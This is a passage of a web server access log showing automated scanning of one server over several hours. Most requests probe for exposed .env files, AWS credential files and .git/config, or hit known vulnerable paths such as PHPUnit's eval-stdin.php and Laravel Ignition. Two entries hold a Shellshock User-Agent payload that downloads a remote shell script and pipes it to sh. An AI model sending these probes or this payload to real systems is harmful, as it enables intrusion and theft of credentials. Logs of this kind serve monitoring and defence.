(iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D100 Safari/604.1" "-" +[16/Jan/2026:18:17:58 +0000] 404 - GET http 92.249.249.197 "/.env-event" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20110518 Firefox/4.0.1" "-" +[16/Jan/2026:18:17:58 +0000] 404 - GET http 92.249.249.197 "/.env-usage" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.02 (Windows NT 5.0; U; pl)" "-" +[16/Jan/2026:18:17:59 +0000] 404 - GET http 92.249.249.197 "/.env.bak.1" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080416 Fedora/2.0.0.14-1.fc8 Firefox/2.0.0.14 pango-text" "-" +[16/Jan/2026:18:17:59 +0000] 404 - GET http 92.249.249.197 "/.env.cache" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3; en-us; HTCONE Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[16/Jan/2026:18:18:00 +0000] 404 - GET http 92.249.249.197 "/.env.netrc" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG-SM-G900A Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36" "-" +[16/Jan/2026:18:18:00 +0000] 404 - GET http 92.249.249.197 "/.env.old.1" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0" "-" +[16/Jan/2026:18:18:00 +0000] 404 - GET http 92.249.249.197 "/.env-trace" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.1.1; ZTE-Z983 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/45.0.2454.95 Mobile Safari/537.36" "-" +[16/Jan/2026:18:18:01 +0000] 404 - GET http 92.249.249.197 "/.env-queue" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MATBJS)" "-" +[16/Jan/2026:18:18:01 +0000] 404 - GET http 92.249.249.197 "/.env-token" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17" "-" +[16/Jan/2026:18:18:01 +0000] 404 - GET http 92.249.249.197 "/.env_panel" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SM-G900H Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36" "-" +[16/Jan/2026:18:18:01 +0000] 404 - GET http 92.249.249.197 "/.env-nginx" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" "-" +[16/Jan/2026:18:18:01 +0000] 404 - GET http 92.249.249.197 "/.env.azure" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; TECNO P5 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[16/Jan/2026:18:18:02 +0000] 404 - GET http 92.249.249.197 "/awstats.jsp" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)" "-" +[16/Jan/2026:18:18:02 +0000] 404 - GET http 92.249.249.197 "/aws_keys.py" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0" "-" +[16/Jan/2026:18:18:02 +0000] 400 - GET http 92.249.249.197 "/aws_keys.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:18:18:02 +0000] 404 - GET http 92.249.249.197 "/awstats.php" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox) Mnenhy/0.7.4.666" "-" +[16/Jan/2026:18:18:02 +0000] 404 - GET http 92.249.249.197 "/.aws/konfig" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SPH-M580 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[16/Jan/2026:18:18:03 +0000] 404 - GET http 92.249.249.197 "/.aws/.s3cfg" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060201 Firefox/1.5.0.1 (Swiftfox) Mnenhy/0.7.3.0" "-" +[16/Jan/2026:18:18:03 +0000] 404 - GET http 92.249.249.197 "/.aws/secret" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.7) Gecko/20050414 Firefox/1.0.3" "-" +[16/Jan/2026:18:18:04 +0000] 404 - GET http 92.249.249.197 "/awstats.txt" [Client 78.153.140.177] [Length 150] [Gzip -] "More Opera 6.01 user agents strings -->>" "-" +[16/Jan/2026:18:18:04 +0000] 404 - GET http 92.249.249.197 "/aws/s3.yaml" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030719 Firefox/3.0.3" "-" +[16/Jan/2026:18:18:04 +0000] 404 - GET http 92.249.249.197 "/painel/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1)" "-" +[16/Jan/2026:18:18:05 +0000] 404 - GET http 92.249.249.197 "/tmp/.env.db" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera 9.4 (Windows NT 5.3; U; en)" "-" +[16/Jan/2026:18:18:06 +0000] 404 - GET http 92.249.249.197 "/source/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" "-" +[16/Jan/2026:18:18:06 +0000] 404 - GET http 92.249.249.197 "/tmp/env.bak" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6" "-" +[16/Jan/2026:18:18:06 +0000] 404 - GET http 92.249.249.197 "/storage.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729)" "-" +[16/Jan/2026:18:18:06 +0000] 404 - GET http 92.249.249.197 "/strapi/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; USCC-US780 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[16/Jan/2026:18:18:06 +0000] 404 - GET http 92.249.249.197 "/qa/.env.bak" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.3; en-us; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[16/Jan/2026:18:18:06 +0000] 404 - GET http 92.249.249.197 "/yii/env.php" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.35" "-" +[16/Jan/2026:18:23:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:18:28:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:18:48:40 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[16/Jan/2026:18:52:33 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0.0; MI 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" "-" +[16/Jan/2026:18:54:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:18:59:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 44.204.228.85] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[16/Jan/2026:19:02:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:19:18:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:19:23:29 +0000] 404 - GET http 92.249.249.197 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[16/Jan/2026:19:24:53 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[16/Jan/2026:19:24:53 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[16/Jan/2026:19:34:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 152.32.207.42] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:19:34:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 152.32.207.42] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[16/Jan/2026:19:35:15 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:19:35:15 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 152.32.207.42] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[16/Jan/2026:19:35:15 +0000] 404 - GET http 92.249.249.197 "/sitemap.xml" [Client 152.32.207.42] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[16/Jan/2026:19:35:15 +0000] 404 - GET http 92.249.249.197 "/config.json" [Client 152.32.207.42] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[16/Jan/2026:19:45:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:19:46:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:19:48:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:19:56:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:20:10:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:20:14:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:20:19:55 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:20:22:12 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:20:33:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:20:36:02 +0000] 400 - - http localhost "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:20:40:50 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:20:56:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:20:58:46 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 176.32.195.85] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko" "-" +[16/Jan/2026:20:59:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:20:59:12 +0000] 404 - GET http 92.249.249.197 "/aaa9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[16/Jan/2026:20:59:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:20:59:12 +0000] 404 - GET http 92.249.249.197 "/aab9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[16/Jan/2026:21:10:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:21:21:53 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:21:22:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:21:29:56 +0000] 404 - GET http 92.249.249.197 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[16/Jan/2026:21:35:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:21:41:28 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[16/Jan/2026:21:48:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:21:55:03 +0000] 404 - GET http 92.249.249.197 "/login.asp" [Client 95.214.55.246] [Length 150] [Gzip -] "-" "-" +[16/Jan/2026:22:08:54 +0000] 400 - GET http 92.249.249.197 "/.env" [Client 143.198.233.138] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[16/Jan/2026:22:08:55 +0000] 400 - GET http 92.249.249.197 "/.git/config" [Client 143.198.233.138] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[16/Jan/2026:22:11:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:22:27:53 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:22:39:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:22:45:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:22:57:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:23:05:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:23:15:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:23:23:18 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.246] [Length 568] [Gzip 1.86] "-" "-" +[16/Jan/2026:23:28:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:23:32:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 44.252.100.122] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[16/Jan/2026:23:32:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[16/Jan/2026:23:42:18 +0000] 404 - GET http 92.249.249.197 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[16/Jan/2026:23:54:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:00:09:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:00:10:01 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[17/Jan/2026:00:10:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.159.99.95] [Length 0] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[17/Jan/2026:00:10:52 +0000] 404 - GET http 92.249.249.197 "/admin/config.php" [Client 91.232.238.112] [Length 150] [Gzip -] "xfa1" "-" +[17/Jan/2026:00:12:08 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:00:17:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:00:20:45 +0000] 404 - POST http 92.249.249.197 "/ssdpcgi" [Client 87.120.187.41] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[17/Jan/2026:00:20:51 +0000] 404 - GET http 92.249.249.197 "/_ignition/execute-solution" [Client 87.120.187.41] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[17/Jan/2026:00:20:57 +0000] 405 - POST http 92.249.249.197 "/" [Client 87.120.187.41] [Length 154] [Gzip -] "Go-http-client/1.1" "-" +[17/Jan/2026:00:21:07 +0000] 404 - POST http 92.249.249.197 "/goform/setMacFilterCfg" [Client 87.120.187.41] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[17/Jan/2026:00:30:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:00:43:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:01:04:16 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 93.123.72.132] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:01:06:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:01:09:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:01:13:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.156.128.131] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[17/Jan/2026:01:18:01 +0000] 404 - GET http 92.249.249.197 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:01:30:47 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:01:35:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.156.128.127] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[17/Jan/2026:01:52:46 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/58.0.3135.107" "-" +[17/Jan/2026:01:54:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:01:57:04 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[17/Jan/2026:01:57:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:02:01:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:02:15:53 +0000] 400 - GET http 92.249.249.197 "/page/style/index.css" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" 